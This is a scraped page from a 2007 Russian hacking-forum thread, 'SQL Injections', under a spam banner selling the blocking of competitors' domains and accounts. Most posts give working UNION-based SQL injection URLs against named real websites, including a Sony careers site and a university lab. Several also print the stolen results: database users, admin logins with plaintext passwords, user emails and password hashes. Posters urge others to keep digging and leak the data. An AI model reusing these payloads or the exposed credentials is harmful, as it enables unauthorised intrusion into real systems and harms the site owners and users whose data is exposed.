УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
SQL Инъекции

Страница 331 из 1242

331

Опции темы

Поиск в этой теме

Опции просмотра

#3301

14.10.2007, 16:55

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

exactly.ru

http://www.exactly.ru/?sub=-10'+union+select+1,concat(version(),0x3a,database( ),0x3a,user()),3/*

5.0.27-log:catalog2:catalog2@localhost

http://www.exactly.ru/?sub=-10'+union+select+1,table_name,3+from+information_s chema.tables+limit+0,1/*

Доступ к information_schema. Ничего интересного не нашел

ma3da.ru

http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.20-lk-log:ma3daru:ma3daru@localhost

все запросы к таблицам отвергаются (

#3302

14.10.2007, 17:23

v1ru$

Постоянный

Регистрация: 17.03.2007

Сообщений: 336

Провел на форуме:
3766085

Репутация: 576

Отправить сообщение для v1ru$ с помощью ICQ

Моя первая найденная инъекция

Код:

http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+co  ncat(version(),0x3a,database(),0x3a,u ser()),2,3/*

Раскрутите кто-нибудь,а то ничего не выходит(

Код:

http://www.gardenshop.ru/co urier.php?CategoryId=-329+union+select+1,table_name,3+from+information_sch  ema.tables+limit+31,1/*
http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+1,co  lumn_ name,3+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='Users'+limit+1,1/*

#3303

14.10.2007, 18:18

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

Наконец-то кое-что стоящее:

epiphyte.ru

http://www.epiphyte.ru/?rid=-53+union+select+1,2,concat(version(),0x3a,database (),0x3a,user())/*

5.0.45-log:u18378:u18378@10.10.223.230

http://www.epiphyte.ru/?rid=-53+union+select+1,2,concat(username,0x3a,user_pass word,0x3a,user_icq)+from+phpbb_users+limit+1,1/*

логин\хеш\уин phpbb больше 3к записей, перебирайте лимитом ))

---------------------------------------------------------------

http://www.i.love.crimea.net/partner.php3?id=-6+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3/*

5.0.27-log:ilove:ilove@localhost

http://www.i.love.crimea.net/partner.php3?id=-6+union+select+1,2,table_name+from+information_sch ema.tables+limit+0,1/*

доступ к information_schema

http://www.cheryclub.org.ua/index.php?area=1&p=gallery&action=showimages&galid =-3+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3/*

4.1.21-standard-log:cheryclu_chery:cheryclu_ptax@localhost

#3304

14.10.2007, 18:18

0x0c0de

Постоянный

Регистрация: 25.05.2007

Сообщений: 448

Провел на форуме:
4226446

Репутация: 1564

Отправить сообщение для 0x0c0de с помощью ICQ

Код:

http://www.bagozzi.com.br/?system=news&eid=-8%20union%20select%201,concat(user,0x3d,senha)%20FROM%20user/*

Sony

#3305

14.10.2007, 18:28

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Sony

SONY Corp.

Достаточно не простой запрос пришлось составлять.
Усечение не робит =\

User: iq-app
DBName: Careers3

Интересные таблицы:
(Client)

Код:

http://scajobs.sony.com/careers/joblist.asp?location=443202))+and+(c.city_name+not+in('asd'))+and+1=(SELECT+TOP+1+COLUMN_NAME+FROM+Careers3.INFORMATION_SCHEMA.columns+WHERE+TABLE_NAME='client'+AND+COLUMN_NAME+NOT+IN('client_id','country_code','hodes_generic','hodes_suffix','client_name','division_name','office_id','status_indicator','address1','address2','city','state','contact','zip_code','phone','batch_client_id','created_user_mgt_id','created_datetime','last_update_user_mgt_id','last_update_datetime',%20'hiring_org_id','updated','old_generic','old_suffix','smartlink_url','apply_statement_indicator','live_smartlink_statement','static_smartlink_statement','FTIndex_Timestamp','update_status','isProvisioned','isAMSDownloadable','AMSDownloaded_Datetime',%20'sourcingAttributionType','attributionQueryStringName'

(user_mgt_additional_info)

Код:

http://scajobs.sony.com/careers/joblist.asp?location=443202))+and+(c.city_name+not+in('asd'))+and+1=(SELECT+TOP+1+COLUMN_NAME+FROM+Careers3.INFORMATION_SCHEMA.columns+WHERE+TABLE_NAME='user_mgt_additional_info'+AND+COLUMN_NAME+NOT+IN('user_mgt_id','office_id','first_name','last_name','email_address','phone_area_number','phone_number','phone_extention','fax_area_number','fax_number','fax_extention','type_indicator','spelling_indicator','team_indicator','advise_expiration_days'%20,'advise_expiration_days','email_notification_indicator','smartlink_indicator','client_id','hiring_orgID','minimum_cost','view_batch','created_user_mgt_id','created_datetime','last_update_user_mgt_id','last_update_datetime','ReportingID','ApplicationID','Contact_typeID','Company_Name','Contact_Name','Auto_Total','Reply_To_Email','IsTranslator'

(emedia)

Код:

http://scajobs.sony.com/careers/joblist.asp?location=443202))+and+(c.city_name+not+in('asd'))+and+1=(SELECT+TOP+1+COLUMN_NAME+FROM+Careers3.INFORMATION_SCHEMA.columns+WHERE+TABLE_NAME='emedia'+AND+COLUMN_NAME+NOT+IN('emedia_id','emedia_code','Hodes_Emedia_code','emedia_type_id','media_typeID','active_indicator','media_entry_type','display_order','ranking_metrix'

дальше не рыл запарился и так, кому интересно сливайте инфу...

thx blackybr

#3306

14.10.2007, 19:16

Heavy Metal

Новичок

Регистрация: 16.09.2007

Сообщений: 25

Провел на форуме:
120760

Репутация: 62

Отправить сообщение для Heavy Metal с помощью ICQ

Код:

http://www.mcsr.olemiss.edu/herbarium/smncheckacc.php?accession=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,table_schema,table_name),17,18,19,20,21+from+information_schema.tables/*    
http://www.mad-love.ru/health.php?grp=15&item=-1+union+select+1,2,login,psw,5,6+from+users+where+login='admin'

#3307

14.10.2007, 19:44

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

Код:

http://oikumena.intalev.ru/search_result.php?cid=49999999%20union/**/select/**/0,concat(sb_admin_name,char(58),sb_pwd,char(58),sb_id),2,3/**/from/**/sbjbs_admin/*

adm:adm:1

#3308

14.10.2007, 20:39

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Код:

http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15/*

u32445@10.10.223.235:5.0.45-log:u32445

Код:

http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+u32445.administrators+limit+0,1/*

admin:ftn-admn
fortun:test
sirius:admn

Код:

http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(login,0x3a,pass,0x3a,email,0x3a,city),3,4,5,6,7,8,9,10,11,12,1 3,14,15+from+u32445.users+limit+0,1/*

sirius:123456:sirius@nm.ru:moscow

Код:

http://www.armofthesea.org/calendar/index.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(user(),0x3a,version(),0x3a,database()),26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43/*

aots_default@localhost:4.1.22-standard:aots_default

Код:

http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4/*&isref=0&page=0&orderby=identity&sort=asc

keiser@blur.compbio.ucsf.edu:5.0.45:keiser

Код:

http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(dbfs_ref_fk,0x3a,md5,0x3a,name,0x3a, code),3,4+from+keiser.dbfs_anno/*

3:ЦA^Р ¬>·.—јYRpЧЕ:Cathepsin L Inhibitor:50160
14:BbwГЬ·Ёд`дЩ#:pgp-:pgp-
3:Њ…ЌєkhaУќґ-°а$:Guanylate Cyclase Activator:78251
3:ўsюqcXёk'#$–ё‚:Glucocorticoid:39100 итд

Код:

http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(dbfs_ref_fk,0x3a,md5,0x3a,name,0x3a,code),3,4+from+keiser_ca.dbfs_anno/*

#3309

14.10.2007, 22:54

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

Библиотека программиста

Information_schema:

http://proge.info/go.php?id=9+union+select+1,2,3,concat(table_name,0 x3a,column_name),5,6,7+from+information_schema.col umns/*

вывод всех таблиц/колонок...

____________

____________

Information_schema.schemata:

http://proge.info/go.php?id=9+union+select+1,2,3,schema_name,5,6,7+f rom+information_schema.schemata/*

здесь выводим все бд,и подбираем в соответствии к интересующим нас таблице/колонке нужную, ибо table_schema не работает...

____________
____________

а это пример вывода:

http://proge.info/go.php?id=9+union+select+1,2,3,concat(login,0x3a,p ass,0x3a,email),5,6,7+from+hostp.admins/

____________

[QUOTE]

#3310

15.10.2007, 01:29

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

Цитата:

Сообщение от fobofob

http://proge.info/go.php?id=9+union+select+1,2,3,schema_name,5,6,7+f rom+information_schema.schemata/*

здесь выводим все бд,и подбираем в соответствии к интересующим нас таблице/колонке нужную, ибо table_schema не работает...

Можно сделать так
http://proge.info/go.php?id=9+union+select+1,2,3,table_schema,5,6,7+ from+information_schema.tables+where+table_name=CH AR(97,100,109,105,110,115)/*
Прочитать об этом можно сдесь
https://forum.antichat.ru/threadnav19605-3-10.html - спасибо [53x]Shadow!
Тогда подбирать не нужно